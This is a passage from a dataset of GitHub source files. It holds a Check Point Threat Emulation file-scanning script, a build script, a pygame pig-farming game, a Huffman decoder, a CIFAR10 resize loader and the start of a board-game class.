utility. Run te_api --help for the arguments details.\n\"\"\"\n\nfrom te_file_handler import TE\nimport os\nimport argparse\nimport concurrent.futures\nimport zipfile\n\n# Following variables can be assigned and used instead of adding them as arguments when running the te_api.py .\n# input_directory and reports_directory have the following default settings.\n# Using the following input directory default setting means - assuming that the input files to handle are in\n# already existing folder : ..appliance_tpapi/te_api/input_files\n# Using the following reports_directory default setting means - creating/using the output directory :\n# ..appliance_tpapi/te_api/te_response_data\ninput_directory = \"input_files\"\nreports_directory = \"te_response_data\"\nappliance_ip = \"\"\nbenign_directory = \"\"\nquarantine_directory = \"\"\n\ndef main():\n \"\"\"\n 1. Get the optional arguments (if any): the input-directory, the output-directory and appliance-ip.\n 2. Accordingly set the api-url, and create the output directory.\n 3. 
Go though all input files in the input directory.\n Handling each input file is described in TE class in te_file_handler.py:\n \"\"\"\n global input_directory\n global reports_directory\n global appliance_ip\n global benign_directory\n global quarantine_directory\n global concurrency\n global url\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-in\", \"--input_directory\", help=\"the input files folder to be scanned by TE\")\n parser.add_argument(\"-rep\", \"--reports_directory\", help=\"the output folder with TE results\")\n parser.add_argument(\"-ip\", \"--appliance_ip\", help=\"the appliance ip address\")\n parser.add_argument('-n', '--concurrency', type=int, help='Number of concurrent loops')\n parser.add_argument('-out', '--benign_directory', help='the directory to move Benign files after scanning')\n parser.add_argument('-jail', '--quarantine_directory', help='the directory to move Malicious files after scanning')\n args = parser.parse_args()\n if args.input_directory:\n input_directory = args.input_directory\n print(\"The input files directory to be scanned by TE : {}\".format(input_directory))\n if not os.path.exists(input_directory):\n print(\"\\n\\n --> The input files directory {} does not exist !\\n\\n\".format(input_directory))\n parser.print_help()\n return\n if args.reports_directory:\n reports_directory = args.reports_directory\n print(\"The output directory with TE results : {}\".format(reports_directory))\n if not os.path.exists(reports_directory):\n print(\"Pre-processing: creating te_api output directory {}\".format(reports_directory))\n try:\n os.mkdir(reports_directory)\n except Exception as E1:\n print(\"could not create te_api output directory, because: {}\".format(E1))\n return\n if args.appliance_ip:\n appliance_ip = args.appliance_ip\n if not appliance_ip:\n print(\"\\n\\n --> Missing appliance_ip !\\n\\n\")\n parser.print_help()\n return\n print(\"The appliance ip address : {}\".format(appliance_ip))\n url = \"https://\" + appliance_ip + \":18194/tecloud/api/v1/file/\"\n if args.benign_directory:\n benign_directory = args.benign_directory\n print(\"The output directory for Benign files: {}\".format(benign_directory))\n if not os.path.exists(benign_directory):\n print(\"Pre-processing: creating Benign directory {}\".format(benign_directory))\n try:\n os.mkdir(benign_directory)\n except Exception as E1:\n print(\"could not create Benign directory because: {}\".format(E1))\n return\n if args.quarantine_directory:\n quarantine_directory = args.quarantine_directory\n print(\"The output directory for Malicious files: {}\".format(quarantine_directory))\n if not os.path.exists(quarantine_directory):\n print(\"Pre-processing: creating Benign directory {}\".format(quarantine_directory))\n try:\n os.mkdir(quarantine_directory)\n except Exception as E1:\n print(\"could not create Quarantine directory because: {}\".format(E1))\n return\n\n\n # Define the list of archive file extensions\n archive_extensions = [\".7z\", \".arj\", \".bz2\", \".CAB\", \".gz\", \".rar\", \".tar\", \".tbz2\", \".tbz\", \".tb2\", \".tgz\", \".xz\", \".zip\", \".udf\", \".qcow2\"]\n\n # A loop over the files in the input folder\n files = os.listdir(input_directory)\n print(\"Begin handling input files by TE\")\n\n # Separate archive files and other files\n archive_files = []\n other_files = []\n\n for file_name in files:\n full_path = os.path.join(input_directory, file_name)\n extension = os.path.splitext(file_name)[1]\n if extension.lower() in archive_extensions:\n 
archive_files.append(file_name)\n else:\n other_files.append(file_name)\n\n # Process other files concurrently\n with concurrent.futures.ThreadPoolExecutor(max_workers=args.concurrency) as executor:\n executor.map(process_files, other_files)\n\n # Process archive files sequentially\n for file_name in archive_files:\n process_files(file_name)\n\n\ndef process_files(file_name):\n try:\n full_path = os.path.join(input_directory, file_name)\n print(\"Handling file: {} by TE\".format(file_name))\n te = TE(url, file_name, full_path, reports_directory, benign_directory, quarantine_directory)\n te.handle_file()\n except Exception as E:\n print(\"Could not handle file: {} because: {}. Continue to handle the next file.\".format(file_name, E))\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"andynicsgithub/Check-Point-TP-API-scan-utility","sub_path":"te_api.py","file_name":"te_api.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"29449942151","text":"import os\nimport rtconfig\nfrom building import *\n\ncwd = GetCurrentDir()\n\npath = [cwd]\n\n# add general drivers\nsrc = Glob('*.c')\n\nsrc += Glob(\"onenet/nb_onenet.c\")\nsrc += Glob(\"onenet/nb_onenet_callback.c\")\npath += [cwd + '/onenet']\n\npath += [cwd + '/tls_configs']\n\ngroup = DefineGroup('ports', src, depend = [''], CPPPATH = path)\n\nReturn('group')\n","repo_name":"lshw/mt2625-rt-thread","sub_path":"ports/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"1599726648","text":"#!/usr/bin/python\n\"\"\"\nMade and produced by Kurced Keyboard Studios, all rights reserved.\nFeel free to edit sound volumes located on lines 66-67.\n\"\"\"\n#Working on:\n#Researching screen and researching itself\n\nimport random,pygame,time,sys,logging\nfrom pygame.locals import *\n#Home brewed libraries:\nfrom wolf import Wolf as WOLF\nfrom pig import Pig as PIG\n\n#library initalizing and whatnot\nSEED = random.randrange(sys.maxsize)\nrandom.seed(SEED)\nlogging.basicConfig(filename='work.log',filemode='w',format='%(name)s @ [%(asctime)s] - %(levelname)s:%(message)s', datefmt='%m/%d/%Y %I:%M %p')\nlogging.root.setLevel(level=logging.DEBUG)\nlogger=logging.getLogger('Butler')\npiglogger = logger.getChild('Pig')\npygame.init()\npygame.mixer.init()\npygame.display.set_caption('Pig')\nflags = pygame.SCALED# | pygame.FULLSCREEN\nGAMESCREEN = pygame.display.set_mode((600,600),flags=flags)\n\nSCREENWIDTH=pygame.display.Info().current_w\nSCREENHEIGHT=pygame.display.Info().current_h\nTPS = 10\nTPSCLOCK = pygame.time.Clock()\nMAPWIDTH = SCREENWIDTH #2000\nMAPHEIGHT = SCREENHEIGHT #2000\n\n#Do a quick debug help:\ndebuglist = {'SCREENDATA':[SCREENWIDTH,SCREENHEIGHT],'MAPDATA':[MAPWIDTH,MAPHEIGHT],'GAMESCREENDATA':GAMESCREEN,'PYGAMEFLAGS':flags}\nlogger.debug('Everything inialized:')\nfor i in debuglist:\n logger.info(str(i)+' - '+str(debuglist[i]))\n\n#Make the background data:\nmapSheet = pygame.image.load('sprites/map/map.png').convert_alpha()\n\nFONTSIZE = 18\n#Colors:\n# R G B\nGRAY = (100, 100, 100)\nNAVYBLUE = ( 0, 0, 150)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = ( 0, 255, 0)\nBLUE = ( 0, 0, 255)\nYELLOW = (255, 255, 0)\nORANGE = (255, 128, 0)\nPURPLE = (255, 0, 255)\nCYAN = ( 0, 255, 255)\nBLACK = ( 0, 0, 0)\nDARKGREEN = ( 0, 155, 0)\nDARKGRAY = ( 40, 40, 40)\n\nMAXWOLVES = 3\nWOLFDELAY = 10\nCAMERASLACK = 
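main() above deliberately fans plain files out over a ThreadPoolExecutor while feeding archives to the appliance one at a time; note also that the mixed-case ".CAB" entry in archive_extensions can never match the lower-cased extension check. The split can be expressed as a small standalone helper; the worker below just prints instead of invoking the TE handler:

import concurrent.futures
import os

ARCHIVE_EXTENSIONS = {".zip", ".rar", ".7z", ".tar", ".gz", ".cab"}   # normalised to lower case

def dispatch(files, worker, max_workers=4):
    archives = [f for f in files if os.path.splitext(f)[1].lower() in ARCHIVE_EXTENSIONS]
    plain = [f for f in files if f not in archives]
    with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as pool:
        list(pool.map(worker, plain))        # plain files go up concurrently
    for f in archives:                       # archives stay sequential
        worker(f)

dispatch(["report.pdf", "samples.zip", "notes.docx"], print)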
30\n\nclass TEXT:\n def __init__(self,dict=None,**kwargs):\n if dict != None:\n kwargs = dict\n self.text=kwargs['text']\n self.color = kwargs['color']\n self.size = kwargs['size']\n self.words = pygame.font.Font(\"freesansbold.ttf\",self.size).render(self.text,True,self.color)\n self.rect = self.words.get_rect()\n try:\n self.x = kwargs['leftcords']['x']\n self.y = kwargs['leftcords']['y']\n self.rect.topleft = (self.x,self.y)\n except:\n #The error here is annoying but it checks if there's a leftcords part of kwargs because I frequently position stuff based off the top left corner\n try:\n self.x=kwargs['rightcords']['x']\n self.y=kwargs['rightcords']['y']\n self.rect.topright = (self.x,self.y)\n except:\n self.x = kwargs['x']\n self.y = kwargs['y']\n self.rect.center = (self.x,self.y)\n\n def drawSelf(self):\n self.words = pygame.font.Font(\"freesansbold.ttf\",self.size).render(self.text,True,self.color)\n GAMESCREEN.blit(self.words,self.rect)\n\nclass FOOD(pygame.sprite.Sprite):\n def __init__(self,pig,shop):\n pygame.sprite.Sprite.__init__(self)\n pGap = 50 #Closest the food can be generated to the pig\n bGap = 20 #Closest to the world border the food can generate\n xF = False\n yF = False\n while not xF:\n x = random.randrange(bGap,MAPWIDTH-bGap)\n if (x <= pig.x - pGap or x >= pig.x + pGap) and x > shop.rect.right:\n xF = True\n while not yF:\n y = random.randrange(bGap,MAPHEIGHT-bGap)\n if (y <= pig.y - pGap or y >= pig.y + pGap ) and y > shop.rect.bottom:\n yF = True\n\n self.color = YELLOW\n self.size = 30\n self.cords = (x,y)\n\n originalImage=pygame.image.load('sprites/slop.png').convert_alpha()\n self.image=pygame.transform.scale(originalImage,(self.size,self.size))\n self.rect=self.image.get_rect(center=(self.cords))\n self.mask=pygame.mask.from_surface(self.image)\n self.mask.scale((self.rect.height,self.rect.width))\n\n self.healthGain = 3\n self.weightGain = 3\n self.staminaGain = .5\n def update(self):\n GAMESCREEN.blit(self.image,self.rect)\n\nclass BUTCHERSHOP(pygame.sprite.Sprite):\n def __init__(self):\n rect1 = pygame.Rect(0,0,20,30)\n rect2 = pygame.Rect(mapSheet.get_rect().w/2,0,20,30)\n self.dayimage = pygame.Surface(rect1.size).convert()\n self.nightimage = pygame.Surface(rect2.size).convert()\n self.dayimage.blit(mapSheet,(0,0),rect1)\n #self.nightimage.blit(mapSheet,(0,0),rect2)\n self.dayimage = pygame.transform.scale(self.dayimage,(120,170))\n self.mask = pygame.mask.from_surface(self.dayimage)\n self.rect = self.dayimage.get_rect()\n\nclass BACKGROUND:\n def __init__(self):\n r = mapSheet.get_rect()\n rect1 = pygame.Rect(0,0,r.w/2,r.h)\n rect2 = pygame.Rect(r.w/2,0,r.w/2,r.h)\n self.dayimage = pygame.Surface(rect1.size).convert()\n self.nightimage = pygame.Surface(rect2.size).convert()\n self.dayimage.blit(mapSheet,(0,0),rect1)\n self.nightimage.blit(mapSheet,(0,0),rect2)\n self.dayimage = pygame.transform.scale(self.dayimage,(SCREENWIDTH,SCREENHEIGHT))\n self.nightimage = pygame.transform.scale(self.nightimage,(SCREENWIDTH,SCREENHEIGHT))\n def drawSelf(self,time):\n if time == 'day':\n GAMESCREEN.blit(self.dayimage,(0,0))\n else:\n GAMESCREEN.blit(self.nightimage,(0,0))\n\nclass SYSTEM:\n def __init__(self):\n self.background = BACKGROUND()\n self.butcherShop = BUTCHERSHOP()\n temp = readFile('data/money.txt')\n self.cash = int(float(temp['CASH']))\n self.earnings = 0\n def draw(self,time):\n self.background.drawSelf(time)\n\ndef readFile(file):\n with open(file,'r') as File:\n fileLines = File.readlines()\n for index,i in enumerate(fileLines):\n 
fileLines[index]=i.replace('\\n','')\n returnData = {}\n for index,i in enumerate(fileLines):\n if index%2 == 0 or index == 0:\n data = fileLines[index+1]\n returnData[i.replace('--','')] = data\n return returnData\n\ndef writeFile(dict,file):\n with open(file,'w') as File:\n for i in dict:\n line = '--'+str(i.upper())+'\\n'\n line2 = str(dict[i])+'\\n'\n File.writelines([line,line2])\n\ndef terminate(pig=None):\n #if pig != None:\n # pig.debug()\n logger.debug('No errors. Exiting game safely')\n logger.info('Seed:'+str(SEED))\n pygame.quit()\n sys.exit()\n\ndef makeWolves(wolfList):\n while len(wolfList) < MAXWOLVES:\n wolfList.add(WOLF(GAMESCREEN,SCREENHEIGHT,SCREENHEIGHT))\n return wolfList\n\ndef makeFood(FoodGroup,pig,systemData):\n #Max food - 5\n while len(FoodGroup) < 5:\n #Generate the actual food objects:\n temp = FOOD(pig,systemData.butcherShop)\n FoodGroup.add(temp)\n return FoodGroup\n\ndef makeCredits(masterList,listToAdd):\n headerColor = ORANGE\n nameColor = CYAN\n headerSize = 40\n nameSize = 40\n headerToNameGap = 30\n nameToHeaderGap = 60\n nameToNameGap = 30\n for index,i in enumerate(listToAdd):\n if index == 0:\n masterList.append(TEXT(text=i,x=SCREENWIDTH/2,y=masterList[-1].rect.bottom+nameToHeaderGap,color=headerColor,size=headerSize))\n elif index == 1:\n masterList.append(TEXT(text=i,x=SCREENWIDTH/2,y=masterList[-1].rect.bottom+headerToNameGap,color=nameColor,size=nameSize))\n else:\n masterList.append(TEXT(text=i,x=SCREENWIDTH/2,y=masterList[-1].rect.bottom+nameToNameGap,color=nameColor,size=nameSize))\n return masterList\n\ndef startScreen(systemData):\n yGap = 30\n optionList = []\n selectedOption = 0\n xGap=20\n yGap=30\n tempList = ['RESEARCH','SETTINGS','QUIT','CREDITS']\n optionList.append(TEXT(text='START GAME',x=SCREENWIDTH/2,y=SCREENHEIGHT/2,color=BLUE,size=FONTSIZE))\n for index,i in enumerate(tempList):\n if index == 0:\n optionList.append(TEXT(text=i,leftcords={'x':xGap,'y':yGap},color=BLUE,size=FONTSIZE))\n else:\n optionList.append(TEXT(text=i,leftcords={'x':xGap,'y':optionList[-1].rect.bottom+yGap},color=BLUE,size=FONTSIZE))\n enter = False\n while not enter:\n systemData.background.drawSelf('night')\n\n for index,i in enumerate(optionList):\n if index == selectedOption:\n i.color = RED\n else:\n i.color = BLUE\n i.drawSelf()\n pygame.display.flip()\n\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_RETURN or event.key == K_SPACE:\n enter = not enter\n elif event.key == K_ESCAPE:\n terminate() \n elif event.key == K_TAB or event.key == K_s or event.key == K_DOWN:\n selectedOption += 1\n if selectedOption >= len(optionList):\n selectedOption = 0 \n elif event.key == K_w or event.key == K_UP:\n selectedOption -= 1\n if selectedOption < 0:\n selectedOption = len(optionList)-1\n if optionList[selectedOption].text == 'START GAME':\n game(PIG(FONTSIZE,SCREENWIDTH,SCREENHEIGHT,GAMESCREEN,readFile('data/stats.txt'),piglogger),systemData)\n elif optionList[selectedOption].text == 'QUIT':\n terminate()\n elif optionList[selectedOption].text == 'CREDITS':\n creditsScreen(systemData)\n elif optionList[selectedOption].text == 'RESEARCH':\n researchScreen(systemData)\n #elif optionList[selectedOption].text == 'SETTINGS':\n # settingsScreen(pig)\n\n\"\"\"def settingScreen(pig):\n imageList=[]\n settings = pygame.image.load(\"Images/SettingsButton.png\")\n imageList.append({\"img\":settings,\"cords\":(SCREENWIDTH-30,SCREENHEIGHT-30)})\n start = 
pygame.image.load(\"Images/StartButton.png\")\n imageList.append({\"img\":start,\"cords\":(SCREENHEIGHT/2,SCREENHEIGHT/2)})\n while True:\n GAMESCREEN.fill(GREEN)\n pig.drawSelf()\n for i in imageList:\n r = i[\"img\"].get_rect()\n r.center = i[\"cords\"]\n GAMESCREEN.blit(i,r)\"\"\"\n\ndef pauseScreen():\n spacer = 20\n paused = TEXT(text=\"PAUSED - \\\"P\\\" TO RETURN\",x=SCREENWIDTH/2,y=SCREENHEIGHT/2,color=RED,size=FONTSIZE)\n quit = TEXT(text=\"QUIT GAME - \\\"Q\\\"\", x=SCREENWIDTH/2,y=paused.rect.bottom + spacer,color=RED,size=FONTSIZE)\n paused.drawSelf()\n quit.drawSelf()\n\ndef midRound(pig,systemData):\n if pig.health <= 0:\n systemData.earnings = 0\n else:\n systemData.earnings += round(pig.weight/(pig.health/pig.speed),2)*5\n\n yGap = 30\n ToDraw = []\n options = []\n ToDraw.append(TEXT(text=('Wallet: '+str(round(systemData.cash,2))+'$'),x=SCREENWIDTH/4,y=SCREENHEIGHT/3,color=BLACK,size=FONTSIZE))\n ToDraw.append(TEXT(text=('Estimated Earnings: '+str(round(float(int(systemData.earnings)),2))+'$'),x=ToDraw[-1].rect.right+(SCREENWIDTH/4),y=SCREENHEIGHT/3,color=BLACK,size=FONTSIZE))\n ToDraw.append(TEXT(text=('Rounds Survived: '+str(pig.age)),x=SCREENWIDTH/2,y=ToDraw[-1].rect.bottom + yGap,color=BLACK,size=FONTSIZE))\n options.append(TEXT(text='CONTINUE',x=SCREENWIDTH/2,y=ToDraw[-1].rect.bottom+yGap,color=BLACK,size=FONTSIZE))\n options.append(TEXT(text='CASH OUT',x=SCREENWIDTH/2,y=options[-1].rect.bottom+yGap,color=BLACK,size=FONTSIZE))\n gameOver = False\n selectedOption = 0\n while True:\n systemData.draw('night')\n\n for index,i in enumerate(options):\n if selectedOption == index:\n i.color = RED\n else:\n i.color = BLACK\n i.drawSelf()\n\n for i in ToDraw:\n i.drawSelf()\n\n TPSCLOCK.tick(TPS)\n pygame.display.flip()\n\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate(pig)\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate(pig)\n elif event.key == K_SPACE or event.key == K_RETURN:\n if options[selectedOption].text == 'CONTINUE':\n gameOver = False\n return pig,gameOver,systemData\n else:\n gameOver = True\n systemData.cash += systemData.earnings\n writeFile({'cash':round(systemData.cash,2),'highscore':pig.age},'data/money.txt')\n return pig, gameOver,systemData\n elif event.key == K_TAB or event.key == K_s or event.key == K_DOWN:\n selectedOption += 1\n if selectedOption >= len(options):\n selectedOption = 0\n elif event.key == K_w or event.key == K_UP:\n selectedOption -= 1\n if selectedOption < 0:\n selectedOption = len(options)-1\n\ndef creditsScreen(systemData):\n masterList = []\n scrollSpeed = 3\n headerColor = ORANGE\n headerSize = 40\n headerToNameGap = 30\n localTPS = 40\n\n masterList.append(TEXT(text='CREDITS',x=SCREENWIDTH/2,y=SCREENHEIGHT,color=headerColor,size=headerSize+10))\n masterList.append(TEXT(text='Pig - Kurced Studios',x=SCREENWIDTH/2,y=masterList[-1].rect.bottom+headerToNameGap,color=headerColor,size=headerSize+10)) \n \n masterList = makeCredits(masterList,['DEVELOPERS','Woldorf'])\n masterList = makeCredits(masterList,['CONTRIBUTERS','Woldorf','Quantavious'])\n masterList = makeCredits(masterList,['ARTISTS','Quantavious'])\n masterList = makeCredits(masterList,['ALPHA TESTERS','Woldorf','Quantavious'])\n masterList = makeCredits(masterList,['ESCAPE TO EXIT'])\n \n #Other types of things to display;\n #Special Thanks\n #Donators\n\n while True:\n systemData.draw('night')\n for i in masterList:\n if i == masterList[-1] and masterList[-1].rect.y <= SCREENHEIGHT/2:\n i.rect.y = SCREENHEIGHT/2\n i.rect.y -= 
scrollSpeed\n i.drawSelf()\n\n TPSCLOCK.tick(localTPS)\n pygame.display.flip()\n\n for i in pygame.event.get():\n if i.type == QUIT:\n terminate()\n elif i.type == KEYDOWN and i.key == K_ESCAPE:\n return\n\ndef game(pig,systemData):\n pig.age += 1 #Basically round count\n FoodGroup = pygame.sprite.Group()\n wolfGroup = pygame.sprite.Group()\n FoodGroup=makeFood(FoodGroup,pig,systemData)\n paused = False\n roundOver = False\n while True:\n systemData.draw('day')\n pig.drawSelf()\n tempList=[]\n for i in pig.drawStats():\n tempList.append(TEXT(dict=i))\n tempList[-1].drawSelf()\n xGap = 5\n rectInflation = 10\n if i['text'] == 'Health:':\n color = BLUE\n if pig.highHealth==pig.MAXHEALTH:\n color = ORANGE\n pygame.draw.rect(GAMESCREEN,RED,pygame.Rect(tempList[-1].rect.right+xGap,tempList[-1].rect.top,pig.highHealth*rectInflation,tempList[-1].rect.height))\n pygame.draw.rect(GAMESCREEN,color,pygame.Rect(tempList[-1].rect.right+xGap,tempList[-1].rect.top,pig.health*rectInflation,tempList[-1].rect.height))\n elif i['text'] == 'Stamina:':\n color = BLUE\n if pig.highStamina==pig.MAXSTAMINA:\n color = ORANGE\n pygame.draw.rect(GAMESCREEN,RED,pygame.Rect(tempList[-1].rect.right+xGap,tempList[-1].rect.top,pig.highStamina*rectInflation,tempList[-1].rect.height))\n pygame.draw.rect(GAMESCREEN,color,pygame.Rect(tempList[-1].rect.right+xGap,tempList[-1].rect.top,pig.stamina*rectInflation,tempList[-1].rect.height))\n FoodGroup=makeFood(FoodGroup,pig,systemData)\n FoodGroup.update()\n wolfGroup=makeWolves(wolfGroup)\n wolfGroup.update(GAMESCREEN)\n\n if paused:\n pauseScreen()\n \n TPSCLOCK.tick(TPS)\n pygame.display.flip()\n\n for i in pygame.event.get():\n if i.type == QUIT:\n terminate(pig)\n\n if pygame.key.get_pressed()[pygame.K_p]:\n if paused:\n logger.info('PAUSED@'+str(time.asctime()))\n else:\n logger.info('UNPAUSED@'+str(time.asctime()))\n paused = not paused\n elif pygame.key.get_pressed()[pygame.K_ESCAPE]:\n terminate(pig)\n\n if not paused:\n if pig.weight >= 30 and int(time.time())%WOLFDELAY == 0:\n for w in wolfGroup:\n if not w.engaged:\n if random.randint(10,30) == w.engageDelay:\n w.engaged = True\n pig.updateSelf()\n pig.moveSelf()\n #Wolf collision\n for w in wolfGroup:\n \n if w.engaged:\n w.moveSelf(pig)\n if isinstance(pygame.sprite.collide_mask(w,pig),tuple):\n if int(time.time()) % w.damageDelay == 0:\n errorPlace = 0 \n for index,i in enumerate(w.attackSprites):\n if w.sCount + index >= len(w.spriteList):\n errorPlace = w.sCount + index\n w.spriteList[(w.sCount + index)-errorPlace] = i\n pig.health -= w.damage\n w.damageDelay = random.randrange(1,10)\n if pig.health < 0:\n roundOver=True\n pig,gameOver,systemData = midRound(pig,systemData)\n #Butcher shop collision\n if isinstance(pygame.sprite.collide_mask(pig,systemData.butcherShop),tuple):\n pig,gameOver,systemData = midRound(pig,systemData)\n roundOver = True\n #Food colision \n for food in FoodGroup: \n if isinstance(pygame.sprite.collide_mask(food,pig),tuple):\n pig.health += food.healthGain\n pig.weight += food.weightGain\n pig.size += food.weightGain\n pig.h += 1\n pig.w += 1\n pig.highStamina += food.staminaGain\n pig.highHealth += food.weightGain/2\n if pig.health > pig.highHealth:\n pig.health = pig.highHealth\n if pig.highHealth > pig.MAXHEALTH:\n pig.highHealth = pig.MAXHEALTH\n pig.healthColor = ORANGE\n if pig.weight >= pig.MAXWEIGHT:\n pig.weight = pig.MAXWEIGHT\n pig.weightColor = ORANGE\n if pig.size > pig.MAXSIZE:\n pig.size = pig.MAXSIZE\n if pig.highStamina >= pig.MAXSTAMINA:\n pig.highStamina = 
pig.MAXSTAMINA\n pig.speedColor = ORANGE\n if pig.speed > pig.minSpeed:\n pig.speed -= pig.speedLoss\n elif pig.speed == pig.minSpeed:\n pig.stamina += pig.staminaGain\n FoodGroup.remove(food)\n if roundOver:\n if gameOver:\n return\n else:\n pig.continueRound()\n FoodGroup.empty()\n wolfGroup.empty()\n roundOver = False\n\ndef researchScreen(systemData):\n xGap=30\n yGap=50\n color = CYAN\n maxUpgrades = 5\n upgradeSize = 10\n upgradeColorLocked = DARKGRAY\n upgradeColorUnLocked = ORANGE\n upgradeColorPurchased = GREEN\n\n statList=readFile('data/stats.txt')\n priceList=readFile('data/prices.txt')\n textList = [TEXT(text='RESEARCH',color=ORANGE,size=FONTSIZE*2,x=SCREENWIDTH/2,y=SCREENHEIGHT/12)]\n optionList = ['Starting Health','Starting Speed','Starting Weight','Max Stamina','Minimum Speed'] #Needs to be in the order of the stats.txt file\n for i in optionList:\n if i == optionList[0]:\n textList.append(TEXT(text=i,color=color,size=FONTSIZE,leftcords={'x':xGap,'y':SCREENHEIGHT/6}))\n else:\n textList.append(TEXT(text=i,color=color,size=FONTSIZE,leftcords={'x':xGap,'y':textList[-1].rect.bottom+yGap}))\n\n for index,i in enumerate(priceList):\n if i.startswith('PIG'):\n if int(statList[i]) == 0:\n temp = int(list(priceList.values())[index])\n else:\n temp = int(statList[i]) * int(list(priceList.values())[index])\n\n if temp == int(list(priceList.values())[0]):\n textList.append(TEXT(text=(str(temp)+'$'),color=color,size=FONTSIZE,rightcords={'x':SCREENWIDTH-xGap,'y':textList[1].rect.top}))\n else:\n textList.append(TEXT(text=(str(temp)+'$'),color=color,size=FONTSIZE,rightcords={'x':SCREENWIDTH-xGap,'y':textList[-1].rect.bottom+yGap})) \n\n textList.append(TEXT(text=('DOUGH IN WALLET: '+str(round(systemData.cash,2))+'$'),color = CYAN,size=FONTSIZE,x=SCREENWIDTH/2,y=textList[-1].rect.bottom+ yGap*2))\n textList.append(TEXT(text='',color=CYAN,size=FONTSIZE,x=SCREENWIDTH/2,y=textList[-1].rect.bottom+yGap))\n\n selectedOption = 0\n while True:\n systemData.draw('night')\n for i in textList:\n i.drawSelf()\n\n circleCenterX = textList[0].rect.right+xGap\n circleCenterY = textList[0].rect.centery\n\n for index,i in enumerate(statList):\n placement = 0\n if textList[index+1].text.find('$')==-1:\n circleCenterX = textList[index+1].rect.right+xGap\n circleCenterY = textList[index+1].rect.centery\n while placement < maxUpgrades:\n upCount = int(statList[i])\n if placement < upCount:\n color = upgradeColorPurchased\n elif placement == upCount:\n if index == selectedOption:\n color = WHITE\n else:\n color = upgradeColorUnLocked\n elif placement > upCount:\n color = upgradeColorLocked\n pygame.draw.circle(GAMESCREEN,color,(circleCenterX,circleCenterY),upgradeSize)\n placement+=1\n circleCenterX += xGap\n circleCenterY += yGap\n\n pygame.display.flip()\n\n for i in pygame.event.get():\n if i.type == QUIT:\n terminate()\n elif i.type == KEYDOWN:\n if i.key == K_ESCAPE:\n writeFile(statList,'data/stats.txt')\n return\n elif i.key == K_TAB or i.key == K_DOWN or i.key == K_s:\n selectedOption += 1\n if selectedOption >= len(optionList):\n selectedOption = 0\n elif i.key == K_w or i.key == K_UP:\n selectedOption -= 1\n if selectedOption < 0:\n selectedOption = len(optionList)-1\n\n#Main while loop:\nwhile True:\n #Game only breaks by using the terminate() function\n logger.info('Pig initlialized, entering the starting screen')\n systemData = SYSTEM()\n 
startScreen(systemData)","repo_name":"Woldorf/Pig-farm","sub_path":"Runner.py","file_name":"Runner.py","file_ext":"py","file_size_in_byte":23562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4433472079","text":"import bitstring\nfrom character import Character\nimport pickle\n\nwhile True:\n folder = input('What folder would you like to uncompress? ')\n\n try:\n name = folder.split('_')[0]\n with open(f'{folder}/{name}COMPRESSED_BIN.bnr', 'rb') as f:\n # opening binary\n file_contents = f.read()\n bits = bitstring.Bits(bytes=file_contents)\n bintext = bits.bin\n\n with open(f'{folder}/{name}TREE.obj', 'rb') as f:\n tree = pickle.load(f)\n\n break\n except FileNotFoundError as e:\n print(f'The given folder couldn\\'t be found (ERROR: {e})')\n\nroot = tree.root\n\nprint(root)\ndecodedString = ''\ncur1sAnd0s = [*bintext]\ncounter = 0\ncurNode = root\nwhile len(cur1sAnd0s) > 1:\n if type(curNode) == Character:\n if curNode.character == 'END':\n break\n decodedString += curNode.character\n curNode = root\n cur1sAnd0s = cur1sAnd0s[counter:]\n counter = 0\n else:\n if cur1sAnd0s[counter] == '0':\n curNode = curNode.left\n elif cur1sAnd0s[counter] == '1':\n curNode = curNode.right\n counter += 1\n\nprint(decodedString)\n","repo_name":"ihmnelson/HuffmanCompressor","sub_path":"decodeBetter.py","file_name":"decodeBetter.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23512098024","text":"from survae.data.loaders import CIFAR10SURVAE\r\nfrom torchvision.transforms.functional import resize\r\nfrom PIL import Image\r\n\r\nstr2interpolation = {\r\n\t'nearest' : Image.NEAREST,\r\n\t'lanczos' : Image.LANCZOS,\r\n\t'bilinear' : Image.BILINEAR,\r\n\t'bicubic' : Image.BICUBIC,\r\n\t'box' : Image.BOX,\r\n\t'hamming' : Image.HAMMING,\r\n}\r\n\r\nclass Resize():\r\n\r\n def __init__(self, size=(32, 32), interpolation='nearest'):\r\n self.size = size\r\n self.interpolation = str2interpolation.get(interpolation, None)\r\n\r\n if self.interpolation is None:\r\n \traise ValueError('Interpolation mode not recognized. 
Use one of these options: \\'nearest\\', \\'lanczos\\', \\'bilinear\\', \\'bicubic\\', \\'box\\', \\'hamming\\'')\r\n\r\n def __call__(self, image):\r\n return resize(image, size=self.size, interpolation=self.interpolation)\r\n\r\n\r\ndef CIFAR10_resized(size=(32, 32), interpolation='bicubic', train_pil_transforms=[]):\r\n\tcifar = CIFAR10SURVAE(pil_transforms=[Resize(size=size, interpolation=interpolation)], train_pil_transforms=train_pil_transforms)\r\n\treturn cifar\r\n","repo_name":"shayan-kousha/SurVAE","sub_path":"survae/data/loaders/cifar10_downsampled.py","file_name":"cifar10_downsampled.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"7326343980","text":"import numpy as np\n\n#Class created by Jalen Jackson\nclass Stone:\n def __init__(self, row, col, state):\n self.state = state\n self.row = row\n self.col = col\n\n\t#Initalize as a dictionary\n self.neighbors = {}\n\n #Prints the type of stone\n def __repr__(self):\n return str(self.state)\n\n#Class created by Jalen Jackson\nclass Board:\n\n #Initializes the board with two black and two white stones on the middle of the board with size N\n def __init__(self, size):\n self.size = size\n self.stones = [[None] * size for i in range(0, size)]\n \n for 